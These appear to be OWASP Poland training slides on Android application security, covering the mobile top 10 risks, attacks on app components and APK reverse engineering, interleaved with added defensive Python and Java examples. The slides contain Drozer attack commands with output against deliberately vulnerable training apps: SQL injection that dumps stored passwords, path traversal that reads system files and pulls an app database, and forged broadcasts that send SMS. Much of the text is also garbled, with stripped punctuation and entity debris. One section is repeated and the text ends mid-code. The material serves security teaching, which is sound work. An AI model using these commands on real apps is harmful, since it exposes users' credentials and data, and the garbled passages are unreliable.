    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Broadcast receivers attacks
dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the component)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
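Both defenses are manifest-level, so the "enumerate exported components" step of every attack section above (activities, services, content providers, receivers) can be done from the manifest that `apktool` or `dz> run app.package.manifest` gives you. The script below is an added example (not from the slides, not a Drozer module): it parses a manifest, applies the export rule (explicit `android:exported` wins, otherwise a component with an `<intent-filter>` is exported), records whether a permission guards the component, and lists the ones that are exported, not the launcher entry point, and carry no permission at all. The manifest is constructed for the example and is not GoatDroid's or Sieve's.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def attr(name: str) -> str:
    """ElementTree spelling of an android:* attribute."""
    return f"{{{ANDROID_NS}}}{name}"


# Constructed manifest mixing guarded and unguarded components (not a real app's manifest).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.demo">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="com.example.demo.permission.INTERNAL" android:protectionLevel="signature" />
  <application android:label="Demo">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true" />
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver">
      <intent-filter>
        <action android:name="com.example.demo.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name=".GuardedReceiver" android:permission="com.example.demo.permission.INTERNAL">
      <intent-filter>
        <action android:name="com.example.demo.INTERNAL_EVENT" />
      </intent-filter>
    </receiver>
    <service android:name=".SyncService" android:exported="false" />
    <provider android:name=".DBContentProvider" android:authorities="com.example.demo.provider"
              android:exported="true" />
  </application>
</manifest>
"""

COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def is_exported(elem: ET.Element) -> bool:
    """Explicit android:exported wins; otherwise a component with an intent-filter is exported.
    Providers without the attribute are treated as exported (the pre-API-17 default), to be conservative."""
    explicit = elem.get(attr("exported"))
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return True
    return elem.find("intent-filter") is not None


def guarding_permission(elem: ET.Element) -> Optional[str]:
    """Any permission attribute that gates access (providers may use read/write-specific ones)."""
    for name in ("permission", "readPermission", "writePermission"):
        if elem.get(attr(name)):
            return elem.get(attr(name))
    return None


def find_exposed_components(manifest_xml: str) -> List[Dict]:
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    pkg = root.get("package", "")
    exposed = []
    for elem in root.find("application"):
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        name = elem.get(attr("name"), "")
        if name.startswith("."):
            name = pkg + name                       # expand the shorthand relative class name
        launcher = any(c.get(attr("name")) == "android.intent.category.LAUNCHER"
                       for c in elem.iter("category"))
        exposed.append({"type": elem.tag, "name": name,
                        "permission": guarding_permission(elem), "launcher": launcher})
    return exposed


def unguarded(components: List[Dict]) -> List[str]:
    """Exported, not the launcher entry point, and no permission at all: review these first."""
    return [c["name"] for c in components if c["permission"] is None and not c["launcher"]]


if __name__ == "__main__":
    comps = find_exposed_components(SAMPLE_MANIFEST)
    for c in comps:
        print(f"{c['type']:<9} {c['name']}  permission={c['permission']}  launcher={c['launcher']}")
    print("unguarded:", unguarded(comps))
```

Feed it the `AndroidManifest.xml` that `apktool d` decodes; a component that shows up in `unguarded` is exactly what `dz> run app.*.info --permission null` would list, and the fix is the `android:exported="false"` or `android:permission` attribute from the slide.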
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about...
Before we start... the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage ndash what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML Data Stores
– Plain text configuration files
– Cookie stores
– SD Card
Insecure data storage ndash how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
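The last mitigation and the "analyze package files" step are checked with the file modes inside the app's private directory, since `MODE_WORLD_READABLE` and `MODE_WORLD_WRITEABLE` are nothing more than the "other" read/write bits on the file. The following is an added example (not from the slides): it parses the output of `adb shell ls -l /data/data/<package>/shared_prefs` (toybox format, with the older toolbox format without a link count tolerated) and reports every regular file that other UIDs can read or write. The listing is constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed output in the shape of `adb shell ls -l /data/data/com.example.demo/shared_prefs`.
SAMPLE_LS = """\
-rw-rw---- 1 u0_a123 u0_a123  412 2016-02-24 10:11 com.example.demo_preferences.xml
-rw-rw-rw- 1 u0_a123 u0_a123  188 2016-02-24 10:12 session.xml
-rw-r--r-- 1 u0_a123 u0_a123 2048 2016-02-24 10:12 credentials.xml
drwxrwx--x 2 u0_a123 u0_a123 4096 2016-02-24 10:10 cache
"""

# mode [links] owner group size date time name ; the link-count column is optional (older toolbox ls).
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcb][rwxsStT-]{9})\s+(?:\d+\s+)?(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<name>.+)$"
)


def parse_ls(text: str) -> List[Dict[str, str]]:
    """Turn `ls -l` lines into dicts; lines that do not match (e.g. 'total 16') are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def world_accessible(entries: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Regular files whose 'other' bits allow read and/or write (what MODE_WORLD_READABLE/WRITEABLE set)."""
    hits = []
    for e in entries:
        mode = e["mode"]
        if mode[0] != "-":          # only regular files; directories are handled by app sandboxing
            continue
        other = mode[7:10]          # the rwx triple for 'other'
        flags = ("r" if other[0] == "r" else "") + ("w" if other[1] == "w" else "")
        if flags:
            hits.append((e["name"], flags))
    return hits


if __name__ == "__main__":
    for name, flags in world_accessible(parse_ls(SAMPLE_LS)):
        print(f"{name}: world-{'readable' if 'r' in flags else ''}{'/writable' if 'w' in flags else ''}")
```

Run the listing on a rooted device or emulator (or with `run-as <package>` on a debuggable build) and compare before and after exercising the app, as the slide suggests; any hit here means the preferences file was opened with a world mode or its permissions were changed later.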
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
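The pseudocode above, written out as an added example (not from the slides) with Python's standard `ssl` module: the pin is a SHA-256 over the DER-encoded leaf certificate in the usual `sha256/<base64>` form, a backup pin is kept so a certificate rotation does not brick the app, and the normal chain-of-trust and hostname checks stay switched on with pinning layered on top rather than replacing them. The certificate bytes and pin values are constructed; `connect_pinned` needs a network and is only called from the `__main__` block.

```python
import base64
import hashlib
import hmac
import socket
import ssl
from typing import Iterable


def pin_of(cert_der: bytes) -> str:
    """'sha256/<base64>' over the DER-encoded leaf certificate (the form most pinning configs use)."""
    return "sha256/" + base64.b64encode(hashlib.sha256(cert_der).digest()).decode()


def check_pin(presented_der: bytes, pins: Iterable[str]) -> bool:
    """True if the presented certificate matches any configured pin (primary or backup)."""
    presented = pin_of(presented_der)
    return any(hmac.compare_digest(presented, p) for p in pins)


def connect_pinned(host: str, port: int, pins: Iterable[str], timeout: float = 5.0) -> str:
    """Open a TLS connection, keep the default chain + hostname validation, then enforce the pin."""
    ctx = ssl.create_default_context()          # chain-of-trust and hostname validation stay on
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
            if not check_pin(der, pins):
                raise ssl.SSLCertVerificationError(f"certificate pin mismatch for {host}")
            return tls.version()


if __name__ == "__main__":
    # Constructed stand-in for a leaf certificate; real pins come from the server's actual cert.
    fake_leaf = b"constructed-not-a-real-certificate"
    pins = [pin_of(fake_leaf), "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="]  # primary + backup
    print("matches primary pin:", check_pin(fake_leaf, pins))
    print("rejects another cert:", not check_pin(b"a-different-certificate", pins))
```

Pinning the public key (the SubjectPublicKeyInfo) instead of the whole certificate is the variant that survives re-issuing the certificate under the same key; the comparison logic is identical, only the bytes hashed change.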
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and...
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened...
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for public domains)
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
• URL Caching
• Copy/Paste buffer Caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage ndash how to find
• Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device.
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:
  run app.provider.info --permission null
Content providers attacks
• Unrestricted access to app database
  – Just query it:
    run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command.
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
Content providers attacks
• SQL injection
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
  unrecognized token: ")" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
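Both provider findings above (the projection/selection injection and the FileBackupProvider traversal) come down to caller-controlled strings reaching SQL or the filesystem unchecked. The following is an added example, not Sieve's or drozer's code: a hypothetical hardened provider that whitelists columns with a projection map, lets strict mode reject a broken WHERE clause, and canonicalises file paths before opening them. The table and column names, the backup directory and the database file name are assumptions.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

/*
 * Hypothetical hardened provider (added example, not Sieve's own code).
 *  - query(): the caller's projection and selection never reach the SQL string
 *    unchecked, so --projection "* FROM Key--" and --selection "'" cannot reach
 *    other tables or break out of the WHERE clause.
 *  - openFile(): the requested path is canonicalised and must stay inside the
 *    backup directory, so /etc/hosts and /data/data/... are rejected.
 * The manifest side (android:exported="false" or a signature-level
 * android:permission on the <provider>) is assumed and not shown here.
 */
public class HardenedBackupProvider extends ContentProvider {
    // Only the Passwords table is exposed, and only these columns of it.
    private static final Map<String, String> PASSWORDS_PROJECTION = new HashMap<>();
    static {
        PASSWORDS_PROJECTION.put("_id", "_id");
        PASSWORDS_PROJECTION.put("service", "service");
        PASSWORDS_PROJECTION.put("username", "username");
    }

    private SQLiteDatabase db;
    private File backupRoot;

    @Override
    public boolean onCreate() {
        // Assumed layout: the app database plus a "backup" folder in private storage.
        db = SQLiteDatabase.openDatabase(getContext().getDatabasePath("database.db").getPath(),
                                         null, SQLiteDatabase.OPEN_READONLY);
        backupRoot = new File(getContext().getFilesDir(), "backup");
        return true;
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("Passwords");
        // Projection map: a column that is not in the map throws
        // IllegalArgumentException instead of being spliced into the SQL.
        qb.setProjectionMap(PASSWORDS_PROJECTION);
        // Strict mode: the selection is parenthesised and test-compiled, so a
        // stray quote or a "1=1) OR (" fragment is rejected, not executed.
        qb.setStrict(true);
        // Values belong in selectionArgs, which are bound as parameters.
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) {
            throw new FileNotFoundException("read-only provider");
        }
        // For content://.../FileBackupProvider/etc/hosts, uri.getPath() is "/etc/hosts";
        // File(parent, child) keeps it relative to backupRoot.
        File requested = new File(backupRoot, uri.getPath());
        try {
            String rootPath = backupRoot.getCanonicalPath() + File.separator;
            // The canonical path resolves "..", "//" and symlinks, so a traversal
            // sequence in the URI cannot escape backupRoot.
            if (!requested.getCanonicalPath().startsWith(rootPath)) {
                throw new FileNotFoundException("path outside backup directory");
            }
        } catch (IOException e) {
            throw new FileNotFoundException("cannot resolve path");
        }
        return ParcelFileDescriptor.open(requested, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // Write operations are deliberately unsupported (cf. app.provider.insert above).
    @Override public String getType(Uri uri) { return null; }
    @Override public Uri insert(Uri uri, ContentValues v) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues v, String s, String[] a) { throw new UnsupportedOperationException(); }
}
```

Re-running scanner.provider.injection and scanner.provider.traversal against such a provider is the check that the two defences actually hold.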
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Sample manifest from GoatDroid:
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
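Applied to the GoatDroid receiver above, the two defences look like this. It is an added example, not GoatDroid's code: a hypothetical rewrite of SendSMSNowReceiver whose manifest entry (shown in the comment) is no longer exported and is guarded by an assumed signature-level permission, and whose onReceive() validates the action and extras instead of handing them straight to SmsManager.

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.telephony.SmsManager;
import android.util.Log;

/*
 * Hypothetical hardened SendSMSNowReceiver (added example, not GoatDroid's code).
 * Assumed manifest, which closes the door before onReceive() is ever called:
 *
 *   <permission android:name="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS"
 *               android:protectionLevel="signature" />
 *   <receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
 *             android:exported="false"
 *             android:permission="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS">
 *       <intent-filter>
 *           <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
 *       </intent-filter>
 *   </receiver>
 *
 * With exported="false" the system drops broadcasts from other UIDs, so the
 * app.broadcast.send call above never reaches this code; the permission covers
 * the case where the receiver must stay reachable for same-signature apps.
 * The checks inside onReceive() are defence in depth for the in-app sender.
 */
public class SendSMSNowReceiver extends BroadcastReceiver {
    private static final String TAG = "SendSMSNowReceiver";
    static final String ACTION_SOCIAL_SMS = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";
    static final int MAX_SMS_LENGTH = 160;

    @Override
    public void onReceive(Context context, Intent intent) {
        // 1. Only react to the action this receiver was registered for.
        if (intent == null || !ACTION_SOCIAL_SMS.equals(intent.getAction())) {
            Log.w(TAG, "ignoring unexpected action");
            return;
        }
        // 2. Validate the extras; the original code trusted both strings blindly.
        String phoneNumber = intent.getStringExtra("phoneNumber");
        String message = intent.getStringExtra("message");
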